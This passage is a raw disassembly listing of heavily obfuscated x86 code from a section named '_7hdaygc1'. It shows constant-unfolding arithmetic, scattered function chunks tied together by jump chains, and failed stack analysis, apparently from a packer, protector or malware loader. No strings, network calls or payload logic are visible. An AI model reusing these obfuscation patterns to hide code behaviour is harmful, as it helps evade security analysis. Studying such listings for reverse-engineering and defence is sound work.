; START OF FUNCTION CHUNK FOR sub_425E64
loc_42DAA4: ; CODE XREF: sub_425E64+7504�j
or eax, 0EF5B3FADh
sub eax, 6D2F628Ah
cmp eax, 84FBE98Dh
jmp loc_427879
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
loc_42DABB: ; CODE XREF: _7hdaygc1:0042B8A8�j
ror eax, 16h
mov ds:dword_42E54C, eax
retn
; ---------------------------------------------------------------------------
loc_42DAC5: ; CODE XREF: _7hdaygc1:00425317�j
jmp loc_423681
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42DACA: ; CODE XREF: sub_423410+35D9�j
rol eax, 16h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
loc_42DACF: ; CODE XREF: _7hdaygc1:00426CE4�j
jmp loc_4252FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_42DAD4: ; CODE XREF: sub_42F8DB-C41E�j
jmp loc_423A2F
; END OF FUNCTION CHUNK FOR sub_42F8DB
; =============== S U B R O U T I N E =======================================
sub_42DAD9 proc near ; CODE XREF: sub_423E31:loc_423E3E�j
; sub_42936E+672B�p
; FUNCTION CHUNK AT 0042626B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426996 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004281DA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004295DF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042A5F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BA4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E8E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F40D SIZE 00000004 BYTES
jb sub_42B2B9
push eax
jmp loc_42E8E8
sub_42DAD9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42DAE5: ; CODE XREF: sub_42C7F3-8B67�j
shl edx, 6
; END OF FUNCTION CHUNK FOR sub_42C7F3
; =============== S U B R O U T I N E =======================================
sub_42DAE8 proc near ; CODE XREF: sub_4269CB:loc_42617A�p
xchg ebx, [esp+0]
pop ebx
push eax
call sub_42CAE1
loc_42DAF2: ; CODE XREF: sub_425A37+8CEB�j
jmp loc_42C1C9
sub_42DAE8 endp
; =============== S U B R O U T I N E =======================================
sub_42DAF7 proc near ; CODE XREF: sub_42A92E+1B8E�j
; sub_42F291:loc_42F823�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00425160 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427336 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004290E9 SIZE 00000017 BYTES
xchg ebx, [esp+0]
pop ebx
xor eax, 0CC9F1B6Bh
add eax, ebp
jmp loc_425160
sub_42DAF7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42DB08: ; CODE XREF: _7hdaygc1:0042C4CF�j
mov eax, [ebp-8]
call sub_42BEDA
; START OF FUNCTION CHUNK FOR sub_4291CE
loc_42DB10: ; CODE XREF: sub_4291CE:loc_425472�j
add ebx, 4A66DC9Ch
add ebx, ebp
add ebx, 0B4157294h
call sub_424E7E
; END OF FUNCTION CHUNK FOR sub_4291CE
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42DB23: ; CODE XREF: sub_425E64:loc_42D36E�j
add edx, 0C6FE8A27h
mov edx, [edx]
xor eax, edx
pop edx
jmp loc_424650
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
loc_42DB33: ; CODE XREF: _7hdaygc1:loc_42B146�j
; _7hdaygc1:0042F4E9�j
rol edx, 12h
add edx, 99906AC5h
xchg edx, [esp]
jmp loc_426917
; =============== S U B R O U T I N E =======================================
sub_42DB44 proc near ; CODE XREF: _7hdaygc1:00424261�j
; sub_4232DA:loc_42BF64�p
; FUNCTION CHUNK AT 0042495E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004257E9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042A483 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042FAF3 SIZE 00000014 BYTES
xchg edi, [esp+0]
pop edi
push 44153841h
pop eax
and eax, 0D278A2D1h
sub eax, 61D3FE45h
xor eax, 5E3C21FEh
jmp loc_42A483
sub_42DB44 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42DB65: ; CODE XREF: sub_42F65A:loc_42D061�j
or eax, 5EE5F150h
xor eax, 7A885AA6h
add eax, ebp
add eax, 0FB8055FDh
mov eax, [eax]
push eax
push offset sub_42F913
jmp loc_42DEB4
; END OF FUNCTION CHUNK FOR sub_42F65A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_158. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42DB87: ; CODE XREF: sub_42A052+2B6C�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42DB8C: ; CODE XREF: sub_424AE1-1577�j
jmp nullsub_114
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_42DB91: ; CODE XREF: _7hdaygc1:004284EE�j
ror eax, 6
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42DB94: ; CODE XREF: sub_4237DA+4CFD�j
sub esi, 18ECE0CEh
xor esi, 0C07E5F16h
add eax, esi
pop esi
jmp loc_42B7A5
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
loc_42DBA8: ; CODE XREF: _7hdaygc1:00426B5D�j
jns loc_424FAA
; =============== S U B R O U T I N E =======================================
sub_42DBAE proc near ; CODE XREF: sub_42D48F-9BBE�p
; FUNCTION CHUNK AT 0042F73F SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
xor edx, 0C2913445h
push offset loc_42331A
jmp loc_42F73F
sub_42DBAE endp
; ---------------------------------------------------------------------------
loc_42DBC2: ; CODE XREF: _7hdaygc1:loc_42F487�j
and edi, edx
mov ecx, [ebp+0]
xor edi, ebp
mov ebx, [eax]
jmp loc_42326C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_144. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42DBD1: ; CODE XREF: sub_42A17C+4C1D�j
jmp loc_42F6BD
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
loc_42DBD6: ; CODE XREF: _7hdaygc1:00428AD6�j
jmp locret_42A786
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_42DBDB: ; CODE XREF: sub_42B907-7F90�j
jz loc_4293AA
xchg esi, [eax]
jmp loc_4293A7
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE7D
loc_42DBE8: ; CODE XREF: sub_42BE7D+8C4�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42BE7D
; =============== S U B R O U T I N E =======================================
sub_42DBEA proc near ; CODE XREF: sub_42BD51-4055�p
; sub_42CDF7-113C�p ...
mov dword ptr [eax], 0
retn
sub_42DBEA endp
; ---------------------------------------------------------------------------
loc_42DBF1: ; CODE XREF: _7hdaygc1:0042EDD2�j
jmp loc_42A6FF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_218. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DBF7 proc near ; CODE XREF: sub_42409E+7404�p
var_14 = byte ptr -14h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004294AA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00429CBC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042AB67 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042E296 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FA0E SIZE 0000001A BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
jmp loc_42FA0E
sub_42DBF7 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_42DC03: ; CODE XREF: sub_42BAE7+2FA1�j
jmp loc_42F411
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42DC08: ; CODE XREF: sub_425E64+1078�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42DC0D: ; CODE XREF: sub_42C7F3:loc_426C4B�j
; sub_42E58D:loc_42703C�j
mov ebp, esp
add esp, 0FFFFFFF4h
push eax
mov eax, ebx
call sub_42F31E
loc_42DC1A: ; CODE XREF: sub_427EF6+6E0E�j
jmp loc_423C7A
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_42DC1F: ; CODE XREF: sub_428B5B-346E�j
jmp loc_42C91F
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
loc_42DC24: ; CODE XREF: _7hdaygc1:0042BFB4�j
push ebp
add esi, 0B8CF3303h
jmp loc_428C9D
; ---------------------------------------------------------------------------
locret_42DC30: ; CODE XREF: _7hdaygc1:0042D1B3�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A62
loc_42DC31: ; CODE XREF: sub_426A62+894�j
jmp nullsub_211
; END OF FUNCTION CHUNK FOR sub_426A62
; ---------------------------------------------------------------------------
mov ds:dword_42B9B8, eax
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42DC3B: ; CODE XREF: sub_425F27:loc_423036�j
push 0E08739C4h
pop eax
xor eax, 827E743Fh
cmp eax, 57B3AA8Ah
jmp loc_423907
; END OF FUNCTION CHUNK FOR sub_425F27
; =============== S U B R O U T I N E =======================================
sub_42DC52 proc near ; CODE XREF: sub_42E85F-5661�p
; _7hdaygc1:0042B078�j
xchg ecx, [esp+0]
pop ecx
add eax, ebp
call sub_42CB0F
loc_42DC5D: ; CODE XREF: _7hdaygc1:0042EE07�j
jmp loc_42FA3E
sub_42DC52 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_42DC62: ; CODE XREF: _7hdaygc1:004234D7�j
retn
; ---------------------------------------------------------------------------
loc_42DC63: ; CODE XREF: _7hdaygc1:0042AA96�j
jmp loc_42D2C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428DE6
loc_42DC68: ; CODE XREF: sub_428DE6+7�j
xchg edi, [esp+0]
mov ebx, edi
pop edi
mov esp, ebp
jmp loc_423EFB
; END OF FUNCTION CHUNK FOR sub_428DE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42DC75: ; CODE XREF: sub_42AFFE:loc_429994�j
xor ecx, 9E024895h
rol ecx, 1Ah
add ecx, 0D5A95407h
xchg ecx, [esp+0]
jmp loc_42B602
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424755
loc_42DC8C: ; CODE XREF: sub_424755:loc_42DEB9�j
jz loc_4294C0
jmp loc_42A522
; END OF FUNCTION CHUNK FOR sub_424755
; ---------------------------------------------------------------------------
or ebp, eax
jmp sub_426008
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260B4
loc_42DC9E: ; CODE XREF: sub_4260B4:loc_426DBE�j
; _7hdaygc1:0042A6B3�j
shl eax, 0Fh
add [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
push offset loc_4242FA
jmp nullsub_70
; END OF FUNCTION CHUNK FOR sub_4260B4
; ---------------------------------------------------------------------------
jo loc_4289AA
jmp loc_42F30C
; ---------------------------------------------------------------------------
push 9A411369h
pop eax
add eax, 228D5D18h
xor eax, 1BC2113Ah
add eax, ebp
push esi
push 0BE58E2A9h
jmp loc_42D815
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42DCDD: ; CODE XREF: sub_425BAD+8368�j
call sub_426BF7
loc_42DCE2: ; CODE XREF: sub_42A9E0+1�j
mov ebp, esp
push offset loc_425B64
jmp loc_42F059
; END OF FUNCTION CHUNK FOR sub_425BAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42DCEE: ; CODE XREF: sub_42C16F:loc_42A276�j
push 9B4BC166h
pop eax
or eax, 402BB84Ch
add eax, 24D6DD77h
popf
xchg eax, [esp+4+var_4]
jmp loc_42D702
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
sub edi, 90221AC1h
jmp loc_42EBC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E076
loc_42DD14: ; CODE XREF: sub_42E076:loc_42E8B8�j
jz sub_42DBEA
sbb edx, ebp
jmp loc_4253C1
; END OF FUNCTION CHUNK FOR sub_42E076
; ---------------------------------------------------------------------------
locret_42DD21: ; CODE XREF: _7hdaygc1:loc_424DEE�j
retn
; ---------------------------------------------------------------------------
loc_42DD22: ; CODE XREF: _7hdaygc1:0042EB68�j
jmp locret_424E91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426315
loc_42DD27: ; CODE XREF: sub_426315+3D6D�j
jmp loc_42715D
; END OF FUNCTION CHUNK FOR sub_426315
; ---------------------------------------------------------------------------
loc_42DD2C: ; DATA XREF: _7hdaygc1:00423955�o
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-8], eax
mov eax, [ebp+8]
jmp loc_42BF0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_42DD3D: ; CODE XREF: sub_42C7F3-61F2�j
jge loc_42552D
and edi, edx
jmp loc_42552C
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42DD4A: ; CODE XREF: sub_4253A0-598�j
jz loc_424BD5
jmp loc_423924
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42DD55: ; CODE XREF: sub_42C16F-683C�j
pop edx
sub edx, 0DD8C2C0Dh
xor edx, 7AD23E23h
add edx, ebp
add edx, 292DDD97h
mov edx, [edx]
jmp loc_428FA0
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42DD71: ; CODE XREF: _7hdaygc1:0042CE67�j
sbb edx, edi
; =============== S U B R O U T I N E =======================================
sub_42DD73 proc near ; CODE XREF: sub_42B4F9+8�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042377A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423F49 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00425869 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426588 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004273F4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428A6F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428DD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042955E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004296D9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AC22 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042AF36 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042D1F9 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042D3BA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042DF41 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042EBBE SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 3
jnz loc_426588
jmp loc_42377A
sub_42DD73 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ecx], edx
jmp sub_428613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42DD90: ; CODE XREF: sub_42E283-1779�j
jg loc_42B2BF
sbb edx, esi
loc_42DD98: ; CODE XREF: sub_42E283:loc_42E0B9�j
call sub_4288FE
test al, al
jz nullsub_83
jmp loc_42A7DF
; END OF FUNCTION CHUNK FOR sub_42E283
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42DDAB: ; CODE XREF: sub_423DFC+5A5A�j
jmp loc_42D195
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DD9
loc_42DDB0: ; CODE XREF: sub_426DD9+8�j
jmp loc_42E91B
; END OF FUNCTION CHUNK FOR sub_426DD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42DDB5: ; CODE XREF: sub_42C16F:loc_428404�j
push ecx
mov ecx, edx
xchg ecx, [esp+18h+var_18]
push 7C48AB08h
pop edx
xor edx, 1C1EFE15h
jmp loc_423C5D
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42DDCC: ; CODE XREF: _7hdaygc1:004271FF�j
call sub_42D85F
jmp loc_42B980
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_42DDD6: ; CODE XREF: sub_428E56�j
push esi
mov esi, edx
call sub_424F0A
loc_42DDDE: ; CODE XREF: sub_42F528-658D�j
jmp loc_42FC09
; END OF FUNCTION CHUNK FOR sub_428E56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CC6
loc_42DDE3: ; CODE XREF: sub_425339:loc_4242B6�j
; sub_425339-1077�j ...
jz loc_425DEF
or eax, eax
push offset loc_425DD9
jmp loc_42A4B0
; END OF FUNCTION CHUNK FOR sub_427CC6
; =============== S U B R O U T I N E =======================================
sub_42DDF5 proc near ; DATA XREF: sub_424CE0+370�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004253FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427105 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004293DF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042BC7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CAB4 SIZE 00000023 BYTES
mov ecx, [ebp-30h]
push edx
push 0EA5DDEE6h
loc_42DDFE: ; CODE XREF: _7hdaygc1:00429B8E�j
pop edx
xor edx, 0EAA1FD41h
loc_42DE05: ; CODE XREF: _7hdaygc1:0042AC85�j
sub edx, 3B96878h
xor edx, 6ECC0C38h
add edx, 6CB39078h
jmp loc_4253FB
sub_42DDF5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shl ebp, 18h
jmp loc_42ED48
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B32F
loc_42DE25: ; CODE XREF: sub_42B32F+532�j
jmp loc_42CC53
; END OF FUNCTION CHUNK FOR sub_42B32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4269CB
loc_42DE2A: ; CODE XREF: _7hdaygc1:0042332E�j
; sub_4269CB+4�j
rol eax, 19h
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_4269CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42DE34: ; CODE XREF: sub_42911B+3B16�j
jmp loc_429000
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42DE39: ; CODE XREF: sub_4253A0:loc_423924�j
test esi, ebx
jmp loc_42DF52
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
locret_42DE40: ; CODE XREF: _7hdaygc1:00426F4E�j
retn
; ---------------------------------------------------------------------------
loc_42DE41: ; CODE XREF: _7hdaygc1:0042D332�j
jmp sub_42A94C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425339
loc_42DE46: ; CODE XREF: sub_425339-105E�j
jmp loc_42DDE3
; END OF FUNCTION CHUNK FOR sub_425339
; ---------------------------------------------------------------------------
loc_42DE4B: ; CODE XREF: _7hdaygc1:loc_423E61�j
and eax, 0DC8B35B3h
test eax, 1000h
jmp loc_42CA8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF3C
loc_42DE5C: ; CODE XREF: sub_42EF3C:loc_42527F�j
call sub_428C3B
xor edx, edx
push ecx
add ecx, 0F818DCA3h
jmp loc_42F0F8
; END OF FUNCTION CHUNK FOR sub_42EF3C
; =============== S U B R O U T I N E =======================================
sub_42DE6F proc near ; CODE XREF: _7hdaygc1:00429505�j
; sub_42F8C4-5189�p
; FUNCTION CHUNK AT 004287C8 SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
add edi, 0D9072889h
mov [edi], edx
pop edi
jmp loc_4287C8
sub_42DE6F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_42DE81: ; CODE XREF: sub_42D002-1D28�j
popf
loc_42DE82: ; CODE XREF: sub_42D002:loc_42B2C9�j
add eax, 54010414h
loc_42DE88: ; CODE XREF: _7hdaygc1:004271E2�j
rol eax, 1
and eax, ds:4000F7h
jmp loc_42EF0B
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6C3
loc_42DE95: ; CODE XREF: _7hdaygc1:loc_42A0DB�j
; sub_42A6C3:loc_42E2C0�j
jz loc_424BDD
jmp loc_426F78
; END OF FUNCTION CHUNK FOR sub_42A6C3
; =============== S U B R O U T I N E =======================================
sub_42DEA0 proc near ; CODE XREF: _7hdaygc1:0042D32A�j
; sub_42E51C+E�p
; FUNCTION CHUNK AT 00424957 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B3C9 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
mov edx, [ebp-14h]
add eax, [edx+20h]
jmp loc_42B3C9
sub_42DEA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BF20
loc_42DEAF: ; CODE XREF: sub_42BF20:loc_4297DE�j
call sub_42B510
; END OF FUNCTION CHUNK FOR sub_42BF20
; START OF FUNCTION CHUNK FOR sub_429557
loc_42DEB4: ; CODE XREF: sub_42F65A-1AD9�j
; sub_429557:loc_42FA5C�j
jmp nullsub_128
; END OF FUNCTION CHUNK FOR sub_429557
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424755
loc_42DEB9: ; CODE XREF: sub_424755+68A4�j
jmp loc_42DC8C
; END OF FUNCTION CHUNK FOR sub_424755
; ---------------------------------------------------------------------------
mov edx, [ebp-4]
lea eax, [ebp-18h]
loc_42DEC4: ; CODE XREF: _7hdaygc1:loc_426B40�j
mov ecx, [ebp-30h]
push edx
jmp loc_42A5B5
; ---------------------------------------------------------------------------
loc_42DECD: ; DATA XREF: sub_4282A9-379E�o
push 119C6F8Fh
pop esi
xor esi, 6FB49637h
add esi, 0F081C18h
jmp loc_42BB7E
; ---------------------------------------------------------------------------
loc_42DEE4: ; DATA XREF: _7hdaygc1:00423894�o
mov eax, [eax]
cmp dword ptr [eax], 0
jz loc_4270F0
jmp loc_42FDBC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42DEF5: ; CODE XREF: _7hdaygc1:00423051�j
jg loc_4265EE
add eax, 9108415Bh
; START OF FUNCTION CHUNK FOR sub_425BAD
loc_42DF01: ; CODE XREF: sub_425BAD+C3E�j
add eax, 0EDE6DD98h
sub eax, 606DEF5Fh
xor eax, 4FE9236Bh
add eax, ebp
jmp loc_42DCDD
; END OF FUNCTION CHUNK FOR sub_425BAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E0C4
loc_42DF1A: ; CODE XREF: sub_42E0C4:loc_426ADD�j
jz loc_42677B
jp loc_426F5E
rol ecx, 9
adc ebp, edi
jmp loc_426773
; END OF FUNCTION CHUNK FOR sub_42E0C4
; ---------------------------------------------------------------------------
loc_42DF30: ; CODE XREF: _7hdaygc1:loc_428F48�j
xor [esi], edx
jmp loc_42E180
; ---------------------------------------------------------------------------
loc_42DF37: ; CODE XREF: _7hdaygc1:0042B818�j
push offset sub_429D1B
jmp loc_42965A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42DF41: ; CODE XREF: sub_42DD73:loc_428DD7�j
or edx, 9BF84B99h
test edx, 40000000h
jmp loc_42EBBE
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42DF52: ; CODE XREF: sub_4253A0+8A9B�j
jnb loc_427E71
push edi
or eax, ebx
jmp loc_424BD5
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
mov [esi], edx
jmp sub_42E94F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42DF67: ; CODE XREF: sub_426130-2052�j
; sub_42FCD3:loc_42579E�j ...
js loc_4287E4
push edx
push 7971E72Bh
pop edx
xor edx, 6EC667F0h
or edx, 3A7B99F7h
jmp loc_4288F4
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
jbe loc_4289A0
jmp loc_424E78
; ---------------------------------------------------------------------------
loc_42DF90: ; CODE XREF: _7hdaygc1:0042318A�j
sbb edx, eax
jmp sub_424AE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42DF98: ; CODE XREF: _7hdaygc1:004236CA�j
; sub_426130-A11�j
and eax, 0B9603080h
add eax, 59EC461Ah
sub eax, ds:4000F8h
xor eax, 0EC8E189Bh
loc_42DFB0: ; CODE XREF: _7hdaygc1:loc_426B91�j
add edi, eax
loc_42DFB2: ; CODE XREF: _7hdaygc1:loc_424F29�j
pop eax
jmp loc_42D37F
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42DFB8: ; CODE XREF: sub_423172:loc_429FD5�j
pushf
push 68363219h
pop eax
add eax, 0A06FC8EFh
xor eax, 8090C33Dh
jmp loc_429DBA
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
loc_42DFD0: ; CODE XREF: _7hdaygc1:loc_4246C2�j
jz loc_429F05
jmp loc_42B1E3
; ---------------------------------------------------------------------------
loc_42DFDB: ; CODE XREF: _7hdaygc1:0042B141�j
push 55BF13E7h
pop edx
and edx, 0C2EB0CF3h
or edx, 3CC9968Eh
add edx, 8356EC44h
popf
xchg edx, [esp]
jmp loc_42BF32
; ---------------------------------------------------------------------------
loc_42DFFC: ; DATA XREF: _7hdaygc1:loc_423681�o
push 623EE207h
pop edi
and edi, 0BFA613DDh
sub edi, 9F379A65h
or edi, 0BD34F5F0h
add edi, 4043CD0Ah
xchg edi, [esp]
jmp loc_42AA5F
; ---------------------------------------------------------------------------
loc_42E022: ; CODE XREF: _7hdaygc1:loc_42F04E�j
xchg edi, [esp]
push 71609A2Ah
sub ebx, edi
jmp loc_423D65
; ---------------------------------------------------------------------------
loc_42E031: ; CODE XREF: _7hdaygc1:loc_42B938�j
rol edx, 15h
mov [esi], edi
popf
jmp loc_429D44
; ---------------------------------------------------------------------------
loc_42E03C: ; CODE XREF: _7hdaygc1:0042C627�j
jz loc_42C8FB
jmp loc_428F07
; ---------------------------------------------------------------------------
loc_42E047: ; CODE XREF: _7hdaygc1:loc_42B349�j
; _7hdaygc1:0042B35D�j
call sub_426471
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42E04C: ; CODE XREF: sub_42C443:loc_42F235�j
jmp loc_42D974
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42E051: ; CODE XREF: sub_42BB83+12�j
jmp loc_42ACCD
; END OF FUNCTION CHUNK FOR sub_42BB83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42E057: ; CODE XREF: sub_42EF91-4E47�j
jmp sub_42C16F
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BE6
loc_42E05C: ; CODE XREF: sub_424BE6:loc_42E27E�j
push 4E3994F8h
pop ebx
or ebx, 0C16BB698h
rol ebx, 0Bh
add ebx, 228AB8EAh
jmp loc_423B03
